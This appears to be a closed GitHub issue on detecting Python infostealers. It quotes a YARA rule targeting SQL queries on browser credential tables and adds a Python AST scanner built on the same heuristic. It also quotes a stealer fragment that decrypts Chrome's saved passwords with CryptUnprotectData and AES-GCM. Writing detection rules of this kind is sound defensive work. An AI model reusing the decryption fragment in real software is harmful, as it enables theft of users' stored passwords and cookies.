Closed christophetd closed 1 year ago
Several stealers such as W4sp stealer, and reols package
See also: https://www.virustotal.com/gui/file/f1fed89b8db4855ff9adbb517b21f136ccc359c4caba2852e57994773501128a from https://github.com/ditekshen/detection:
```yara
rule INDICATOR_SUSPICIOUS_EXE_SQLQuery_ConfidentialDataStore {
    meta:
        author = "ditekSHen"
        description = "Detects executables containing SQL queries to confidential data stores. Observed in infostealers"
    strings:
        $select = "select " ascii wide nocase
        $table1 = " from credit_cards" ascii wide nocase
        $table2 = " from logins" ascii wide nocase
        $table3 = " from cookies" ascii wide nocase
        $table4 = " from moz_cookies" ascii wide nocase
        $table5 = " from moz_formhistory" ascii wide nocase
        $table6 = " from moz_logins" ascii wide nocase
        $column1 = "name" ascii wide nocase
        $column2 = "password_value" ascii wide nocase
        $column3 = "encrypted_value" ascii wide nocase
        $column4 = "card_number_encrypted" ascii wide nocase
        $column5 = "isHttpOnly" ascii wide nocase
    condition:
        uint16(0) == 0x5a4d and 2 of ($table*) and 2 of ($column*) and $select
}
```
Also often coupled with win32crypt.CryptUnprotectData e.g.
```python
def tahg(pene):
    x = json.loads(open(os.environ['LOCALAPPDATA'] + "\\Google\\Chrome\\User Data\\Local State", "r", encoding="utf-8").read())
    try:
        mk = win32crypt.CryptUnprotectData(base64.b64decode(x["os_crypt"]["encrypted_key"])[5:], None, None, None, 0)[1]
    except:
        mk = ""
    try:
        return (AES.new(mk, AES.MODE_GCM, pene[3:15]).decrypt(pene[15:])[:-16]).decode()
    except:
        return ""
```
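As an added example (not code from the issue or from the project), the heuristic of the YARA rule above ported from PE binaries to Python source: it walks the AST for string constants that SELECT sensitive columns from the listed browser credential tables, and for calls to `win32crypt.CryptUnprotectData`. Table and column names are the rule's; the scoring threshold and the two sample snippets are constructed.

```python
import ast
import re

# Table and column names come from the ditekSHen YARA rule quoted above; this
# applies them to Python source text rather than PE binaries (constructed port).
SENSITIVE_TABLES = {"credit_cards", "logins", "cookies",
                    "moz_cookies", "moz_formhistory", "moz_logins"}
SENSITIVE_COLUMNS = {"name", "password_value", "encrypted_value",
                     "card_number_encrypted", "ishttponly"}
SQL_RE = re.compile(r"select\s+(?P<cols>.+?)\s+from\s+(?P<table>\w+)",
                    re.IGNORECASE | re.DOTALL)


def scan_source(source):
    """Flag Python that SELECTs sensitive columns from browser credential
    tables and/or calls DPAPI via win32crypt.CryptUnprotectData."""
    found = {"sql_tables": set(), "sql_columns": set(), "dpapi_calls": 0}
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Constant) and isinstance(node.value, str):
            for m in SQL_RE.finditer(node.value):
                table = m.group("table").lower()
                if table in SENSITIVE_TABLES:
                    found["sql_tables"].add(table)
                    cols = {c.strip().lower() for c in m.group("cols").split(",")}
                    found["sql_columns"] |= cols & SENSITIVE_COLUMNS
        elif isinstance(node, ast.Call):
            # Matches win32crypt.CryptUnprotectData(...) and the bare imported name
            if ast.unparse(node.func).endswith("CryptUnprotectData"):
                found["dpapi_calls"] += 1
    # Heuristic threshold (constructed): credential-table SQL plus DPAPI use,
    # or SQL touching two or more of the sensitive columns.
    found["suspicious"] = bool(found["sql_tables"]) and (
        found["dpapi_calls"] > 0 or len(found["sql_columns"]) >= 2)
    return found


# Constructed samples: a stealer-like snippet and a benign sqlite query.
SAMPLE_STEALER = '''
import win32crypt
cur.execute("SELECT action_url, username_value, password_value FROM logins")
mk = win32crypt.CryptUnprotectData(blob[5:], None, None, None, 0)[1]
'''
SAMPLE_BENIGN = 'cur.execute("SELECT id, name FROM users WHERE id = ?", (uid,))'

if __name__ == "__main__":
    print(scan_source(SAMPLE_STEALER))
    print(scan_source(SAMPLE_BENIGN))
```

The benign query selects a `name` column, but from an unlisted table, so it is not flagged; only table hits count.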
closing as dupe of #232